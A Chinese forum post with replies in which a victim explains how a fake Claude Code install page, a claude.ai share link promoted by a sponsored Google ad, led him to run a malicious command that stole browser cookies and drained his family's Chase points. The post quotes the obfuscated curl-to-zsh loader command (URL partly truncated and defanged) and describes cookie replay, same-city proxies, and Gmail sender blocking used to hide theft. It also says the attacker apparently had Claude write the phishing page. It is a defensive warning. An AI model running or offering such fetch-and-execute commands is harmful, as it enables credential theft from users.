查看: 14506| 回复: 53
跳转到指定楼层
上一主题 下一主题
收起左侧

我的 Claude 账号自己升级了,十二小时后,我和老婆的 Chase 积分被清空

   
😂 4
😱 66
11
全局:

注册一亩三分地论坛,查看更多干货!

您需要 登录 才可以下载或查看附件。没有帐号?注册账号

x
(因为事情略微有些复杂,所以下面的内容主要是Claude写的)

7 月 15 号中午,我收到一封 Anthropic 的邮件,说我的 Claude 订阅从 Pro 升到了 Max,每月 20 刀变成 100 刀。

我没做过任何操作。

五分钟后,我老婆的 Gmail 也收到一封,她的账号从 Max 升到了更高一档,100 变 200。她也没操作。

第一反应当然是 Anthropic 出 bug 了。上 Twitter 搜,上 Google 搜,什么都没搜到。找客服机器人申请退款,批了,顺手重新订阅了 Pro。看起来这事就算过去了。

到了下午,又来一封邮件。我的账号,又从 Pro 变成了 Max。

这时候我才开始认真起来。我的 Claude 是 Google SSO 登的,压根没有独立密码。如果不是 Anthropic 那边的问题,那就只能是 Google 账号出事了。晚上十点,我改了 Google 密码,改完顺手看了一眼登录设备列表——全是我家,拉斯维加斯,一台陌生设备都没有。我当时是松了口气的,心想大概是虚惊一场。

十一点,手机弹出一封 Chase 的邮件。我点进去看:我用 Ultimate Rewards 积分兑换了几张 Apple 礼品卡,订单已下单,待发货。

我当然没有兑换过任何东西。

我回过头去想再看一遍那封邮件——它没了。

前后不到两分钟。收件箱里没有,垃圾桶里也没有。我搜了半天,那封我刚刚亲眼读过的邮件,在我的邮箱里彻底不存在了。

过了一会我登录chase,发现了好几条兑换礼品卡的记录。我的十几万积分都兑光了。我老婆的账户也是。

这个人的手法有多干净

接下来那几个小时,我把能查的地方都查了一遍,而每一处都告诉我"一切正常"。现在回头看,这恰恰是这套攻击最狠的地方——它被设计成什么痕迹都不留。

IP。 Gmail 网页版拉到最底部有个"上次账号活动 → 详细信息",会列出访问 IP。我翻出来,两个 IP:一个是我家,另一个 68.224.249.132 我不认识,但一查——也在拉斯维加斯,也是 Cox 的住宅段。

我差点就放过它了。都在本地,能有什么事?

后来才明白:住宅代理是按城市卖的。 攻击者接管账号的标准操作,就是买一个和受害者同城、同 ISP 的出口 IP,专门为了让 Google 和 Chase 的风控看到"NV、Cox、和平时一样",不触发任何告警、不要求重新 2FA。

"所有登录都在我的城市"从来就不是无罪证明。它恰恰是这套东西被设计出来的样子。

设备列表。 我看设备列表干净,以为没事。错。被盗的会话 cookie 重放时,在 Google 眼里就是我本人:不新增设备、不发通知、不要求 2FA——因为 cookie 本来就是 2FA 之后签发的产物,它压根不经过认证那一层。

删除和屏蔽。 这两件事我想放在一起讲,因为我觉得它们是同一个动作的两半。

那封邮件我收到了,也读了。两分钟后它就没了——不是删到垃圾桶,是彻底删除,垃圾桶里也搜不到。

后来我去翻 Gmail 的屏蔽列表,发现里面有一条 Chase Ultimate Rewards donotreply@giftcards.chase.com——就是负责发礼品卡卡号的那个发件人。我老婆的邮箱里,也有同一条。

我自己的理解是这样的:一开始他没想到屏蔽这回事,那封确认邮件就正常进了我的收件箱。然后他看到那封邮件变成了已读,意识到我看见了。于是他把邮件彻底删掉,顺手把发件人屏蔽了。

对一封已经被我读过的邮件来说,屏蔽是没有意义的。但对接下来要发过来的卡号来说,它太有意义了——被屏蔽的邮件不进收件箱,直接落垃圾邮件,我不会收到任何提示,而他可以慢慢去垃圾邮件里把码取走。

也就是说,那两分钟里,有一个人在我的邮箱里,看着我的动作,实时调整他的做法。

最要命的一点:我十点改了 Google 密码,十一点 Chase 照样被清空了。

按理说改密码会踢掉所有会话。它没断。这说明对方的访问权,从头到尾就不在"密码"那一层。

于是那一晚我什么都没查到,但我的积分是真的没了。

然后我想起来一件事

凌晨两点多,我还在跟 Claude 掰扯这件事。

我们在讨论对方到底是怎么拿到我凭据的,它问我:最近有没有装过什么新东西?MCP server、Chrome 扩展、VS Code 插件、第三方程序,任何东西?

我说没有。我确实想不起来自己装过什么不正经的玩意儿。

过了一会儿,我突然想起来:7 月 12 号,我装过 Claude Code。

之所以能想起来,是因为当时就觉得有点怪:那条安装命令跑完,什么都没发生,Claude Code 根本没装上。 我还纳闷了一下,后来懒得管,换了安装包的方式重新装了一遍,装好就把这事忘干净了。

现在回想——它当然装不上。它压根就不是安装脚本。

我翻浏览器历史记录,找到那天那个页面,点了回去。



然后我才看清楚:那根本不是 claude.ai 的官方安装说明。那是一个聊天记录分享页。

页面最顶上有一行灰色小字:"This is a copy of a chat between Claude and Apple Support." 一个真实的 Claude 对话分享链接,对话里那个人设的名字叫 "Apple Support",整篇"教程"是他让 Claude 写出来的。而那条命令,是 Claude 自己的代码块 UI 渲染的,自带一个 Copy 按钮。

那行小字,我 12 号点进去的时候完全没看见。我看见的是 claude.ai 的域名、一个排版专业的安装指南、和一个 Copy 按钮。

那条命令是:
curl -kfsSL $(echo 'aHR0cDovL21hbHN0b3AuY29t...' | base64 -D) | zsh
解码出来是:
hxxp://malstop[.]com/curl/abc638f8...(64 位 hex)
那不是安装脚本,那是远程代码执行。我把一个陌生服务器返回的任意内容,直接喂给了 zsh,以我自己的用户身份执行。

而且跑完之后,弹出来一个要输 Mac 密码的框。装软件的时候输密码,谁不输?我输了。

我们查了一整晚"入口在哪"。入口在我自己的 shell 里,是我自己敲的。

技术上发生了什么

那条命令,每一个字符都不无辜:

http:// 而不是 https。-k 是禁用 TLS 证书校验——https 都不用了还要 -k,唯一的用途就是让中间人和自签名畅通无阻。$(echo '...' | base64 -D) 把 URL 藏起来,这一步存在的唯一目的,就是让你在按回车之前看不见域名。| zsh 下载什么执行什么,你连看一眼的机会都没有。最后那个 64 位 hex 路径是一次性受害者令牌——他们知道是谁点的、什么时候跑的,还能给不同的人发不同的载荷。

事后我搜了一下,这不是新招。微软安全团队 2026 年 5 月发过报告,自 2 月起就在跟这类活动:诱导用户在 Terminal 里粘贴命令,curl 拉回第一阶段 loader,第二阶段是个 zsh loader,用 Base64 + Gzip 解码解压载荷再 eval 执行,专门绕静态特征检测。有个细节挺有意思:它会检测系统里有没有俄语/独联体键盘布局,有就自动退出。
这个家族偷什么,报告里写得很清楚:Keychain、浏览器凭据库和 cookie、SSH key、AWS 凭据、Kubernetes config、MetaMask/Phantom 扩展、Exodus/Electrum 钱包。

全对上了。我输的那个 Mac 密码解锁了 login keychain,里面有 Chrome 的 Safe Storage key,那把钥匙的唯一用途就是解密 Chrome 的密码库和 cookie。而 7 月 10 号,我在同一台电脑、同一个 Chrome profile 里登过我和我老婆两个人的 Chase 账号,Claude 的会话也在同一个 profile 里。

一次 dump,两个人的全拿。 Anthropic 那次五分钟连击,和 Chase 那次一小时内清空两个账号,都不需要什么巧合——它们本来就装在同一个盒子里,而那个盒子在 12 号就被端走了。

至于设 filter、删邮件是怎么做到的:不需要任何 API,他就是用鼠标点的。 把偷来的 cookie 导进他自己的浏览器,打开 mail.google.com,已登录,是我。跟我自己点的一模一样。这也是为什么 Google 的第三方授权列表里什么都查不到——那不是"第三方应用",那就是我本人。

为什么能骗到我

我复盘了一下,主要是两件事叠在一起。

第一,那个网站在 Google 排得很高,而我没意识到它是广告。

我截了图(见附件)。搜索结果里,第一条是 ChatGPT 的 Codex,我注意到它是 Sponsored 的。然后往下,第二条就是那个"Claude Code Mac"。

我压根没注意到第二条也在 Sponsored 区里。 我以为广告只有第一条,下面就是自然结果了。而它显示的域名是 claude.ai——Claude 自己的域名。

那我还有什么好怀疑的?一个排在很前面、域名是 claude.ai 的搜索结果,天然就是可信的。

而且它确实就在 claude.ai 上。 广告主没有伪造任何域名——他只是在 claude.ai 上开了一个分享页,然后买了一条指向它的广告。域名是真的,证书是真的,页面也确实托管在 Anthropic 的服务器上。假的只有内容。

整条链路上,每一个域名都是真的。

第二,在 macOS 上用命令行装东西,本来就太正常了。

Claude Code CLI 官方就是这么装的。Homebrew 也是这么装的。开发者每天都在干这件事。所以看到"打开 Terminal,粘贴这条命令"的时候,我一点警觉都没有——这就是我预期中该出现的东西。

我的疏忽就在这一点上:基于前面两条带来的信任,我没有仔细看那条命令就直接执行了。

其实那条命令里的红旗一个不少。但当你已经默认这个页面是官方的、这个流程是正常的,你就不会去逐字读一条你觉得理所当然的命令。

顺便说一句,curl | bash 本身不等于恶意——Homebrew 就是这个形式。区别在于 Homebrew 用的是 https,而且那个 raw.githubusercontent.com 的地址你看得见。真正的判据是:URL 被藏起来了、用了 -k、用了 http://。

自查

如果你最近装过什么东西,回忆一下这两件事就够了:

有没有从网上复制过一条命令粘进 Terminal 执行?执行之后,有没有弹出来一个框让你输电脑密码?

如果两个都是"有"——尤其是那个命令跑完之后东西根本没装上,那你需要认真看一下了。

反思

关于 Google,我想说的比"审核不严"更难听一点。

它不是漏掉了一条广告。它是收了钱,把这条广告放在了官方网站上面(真正的 claude.com 排在它下面)。

而且最让人无语的是:Google 的检查很可能全部通过了。

Google Ads 要求"展示网址的域名必须和最终网址的域名一致"。这次它确实一致——因为落地页真的在 claude.ai 上。广告主没有伪造任何东西,他只是买了一条指向 claude.ai 的广告,而那个页面的内容是他自己写的。

所以问题不是审核不严,是审核机制建立在"域名 = 可信"这个假设上,而攻击者租用了可信域名下的一条路径。

这个洞是结构性的。它意味着,只要一个可信平台允许用户生成公开页面——分享链接、用户主页、docs、gist、notion、任何东西——那个域名的可信度就可以被任何人租用,然后拿去买广告。

Google 从这笔广告费里赚走的那一份,应该足够让它对"用一个自己不控制内容的域名投广告"这件事多做一层校验。

顺便,广告和自然结果的视觉区分也该说一句。我是个天天用 Google 的工程师,我都没看出来第二条是广告。这个"Sponsored"的标记做成什么样子,不是设计问题,是责任问题。

关于 Anthropic,我也不打算放过。

claude.ai/share/ 让任何人可以在 Anthropic 的域名、Anthropic 的 TLS 证书下发布任意内容。而且——Claude 自己的 UI,给那条恶意命令渲染了一个 Copy 按钮。
分享页顶部确实有一行灰色小字:"Content may include unverified or unsafe content that do not represent the views of Anthropic"。这说明他们知道这个风险存在。

但一行灰色小字,对上一个绿色代码块加一个 Copy 按钮,谁赢是显然的。

至少检测一下分享内容里的 curl | sh、给带 shell 命令的分享页加个显眼的拦截,应该不难吧。一个 AI 公司,拿自己的产品生成钓鱼页面这件事,总该在自己家门口先防一道。

最后说说这帮人的幽默感

写到这儿气也出得差不多了,说两个我觉得挺有意思的细节。

第一,那个域名叫 malstop。

Malware stop。恶意软件拦截。

一个专门分发恶意软件的域名,起了个杀毒软件的名字。我不知道这是纯粹的自我调侃,还是为了让人扫一眼的时候下意识觉得这是个安全工具——大概两者都有。
第二,他们给我的账号升级了。

这件事我到现在也没完全想明白。他们拿到了我和我老婆的 Claude 账号,一个从 Pro 升到 Max,一个从 Max 升到更高一档,按面值算,每个月多给 Anthropic 送 180 刀。

然后呢?

然后什么都没发生。我查了用量,没有任何异常的 token 消耗。他们一次都没用。

我能想到的唯一解释是:他们用 Claude 生成了那个钓鱼页面,骗到号之后,用我的钱给 Anthropic 充值。

一种奇特的感恩。用 Claude 写钓鱼页,拿钓来的号给 Claude 充钱,闭环了。

顺便说一句,这个"账号自己升级"的事,Reddit 上有一堆人遇到,到现在没人找到原因。

我也不敢打包票那和我这次是同一回事。"退款之后又被悄悄升回去"这个行为,老实说也挺像一个坏掉的计费状态机——如果他们真图我的额度,他们会用,可他们没用。
Chase 那部分是确定的,那条恶意命令是确定的,中间的因果我不知道。

所以如果你的 Claude 账号也被莫名其妙升级过,麻烦回想一下前面那两个问题:有没有从网上粘过命令进 Terminal,粘完有没有输过电脑密码。 如果大家都是"没有",那多半就是个 bug,可以放心睡觉。如果不止一个人中,那这事就比一个 bug 大多了。

最后

这个攻击骗过的不是粗心的人,恰恰是有经验的人。因为只有天天用 Terminal 的人,才会看到"粘贴这条命令"觉得理所当然,才会毫不犹豫地按下回车。它专门挑我们这种人。

如果只让我留一条经验:

任何来自网页的命令,在按回车之前,先把它拆开读懂。base64 -D、-k、http://、| zsh——这四个里出现任何一个,就是停手信号。

希望没人再踩这个坑。有问题欢迎问,我这两天都在处理后续。

评分

参与人数 49大米 +78 收起 理由
头铁小渣渣 + 1 赞一个
小丸几 + 1 很有用的信息!
匿名用户-XROG7 + 3 赞一个
RyanRyan + 1 很有用的信息!
allyss + 1 很有用的信息!

查看全部评分


上一篇:钱凭空消失!美储户账户遭隔空操控,上万美金转出后彻底追不回!

相关帖子

😂 2
全局:
给你账号升级是为了分散你注意力,当你和客服联系的时候,给骗子足够的时间行动。
回复

使用道具 举报

全局:
Holy molly cow! 楼主 你是我的大恩人…我tm差点中招
这个词条还在google top search

补充内容 (2026-07-18 00:39 +08:00):
我刚刚在google上举报了那个网页 但是我发现我这边打开的decode以后的网址和你写的不一样 很有可能有好几个这种sponsored links 不确定我这边举报能不能remove全部的这个links

也发邮件report给了claude 但是感觉claude应该限制这种chats的share
回复

使用道具 举报

全局:
不对俄语用户下手,东欧黑客还真是不吃窝边草😭
回复

使用道具 举报

全局:
以后不敢乱安装插件了,回想一下我也不怎么看就往terminal里面扔指令…
回复

使用道具 举报

全局:
感谢分享。
回复

使用道具 举报

全局:
地球某个角落的人想偷用你的高级版Claude
回复

使用道具 举报

全局:
读前半篇还以为是Google出问题了,吓鼠我了

原来是安装了钓鱼软件
回复

使用道具 举报

全局:
大米支持一个
谢谢楼主分享
回复

使用道具 举报

全局:
我现在都是让codex给我装软件,懒得自己下载加鼠标点击, 这应该不会把codex也骗了吧。。。。。
回复

使用道具 举报

全局:
还是用homebrew放心些
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册账号
隐私提醒:
  • ☑ 禁止发布广告,拉群,贴个人联系方式:找人请去🔗同学同事飞友,拉群请去🔗拉群结伴,广告请去🔗跳蚤市场,和 🔗租房广告|找室友
  • ☑ 论坛内容在发帖 30 分钟内可以编辑,过后则不能删帖。为防止被骚扰甚至人肉,不要公开留微信等联系方式,如有需求请以论坛私信方式发送。
  • ☑ 干货版块可免费使用 🔗超级匿名:面经(美国面经、中国面经、数科面经、PM面经),抖包袱(美国、中国)和录取汇报、定位选校版
  • ☑ 查阅全站 🔗各种匿名方法

本版积分规则

>
快速回复 返回顶部 返回列表